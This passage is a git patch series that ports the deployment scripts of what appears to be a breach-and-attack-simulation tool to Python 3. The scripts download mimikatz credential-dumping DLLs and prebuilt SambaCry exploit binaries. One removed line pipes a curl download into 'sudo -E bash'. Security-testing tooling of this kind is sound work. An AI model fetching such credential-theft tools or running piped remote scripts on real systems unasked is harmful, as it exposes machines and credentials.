"https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat index e2bf2935e..f763bda6b 100644 --- a/monkey/infection_monkey/build_windows.bat +++ b/monkey/infection_monkey/build_windows.bat @@ -1 +1 @@ -pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec +pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 2d8caddd7b0c0dfa281554c5d89db6515ff250cf Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 06/44] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." From 7f009da96853be2422f939c53a71732d28580bc1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 07/44] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config @@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" +# Other binaries for monkey +TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64" +TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32" +SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so" +SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so" + # Mongo url's MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 4df8ba114..136e3f8b1 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" @@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" @@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl @@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt +++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index a2e734324..c887b8527 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From df7a43127a72d9ccb028f5bd246295540924218d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 08/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" @@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" From 1c880a76d9556a0561d45153eeb42d004f645516 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 09/44] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 ++++++-------- deployment_scripts/deploy_windows.ps1 | 35 ++++++--------------------- monkey/infection_monkey/monkey.spec | 12 +-------- 3 files changed, 15 insertions(+), 50 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output @@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] From e7a71e10d8decc92b750fbdd0085e4eded57b850 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 10/44] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- 3 files changed, 57 insertions(+), 60 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } @@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { @@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { @@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { @@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": 